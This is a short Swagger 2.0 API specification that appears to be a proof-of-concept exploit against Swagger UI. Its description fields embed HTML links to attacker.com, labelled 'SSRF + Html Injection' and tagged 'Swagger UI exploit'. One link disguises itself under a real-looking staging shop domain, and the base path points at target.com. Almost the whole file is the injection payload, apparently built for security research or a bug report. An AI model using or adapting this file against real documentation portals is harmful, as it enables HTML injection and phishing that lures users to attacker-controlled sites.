---
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    SSRF + Html Injection : <a href="https://attacker.com">shoppingcart.stg.travix.com</a>

  version: production
basePath: https://target.com
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/a":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - Mathis Pais De Sousa
      operationId: findAccounts
      summary: this is example text
  "/b":
    delete:
      parameters:
      - description: |
          <a href=https://attacker.com>Click on me</a>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: swagger
      summary: swagger
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
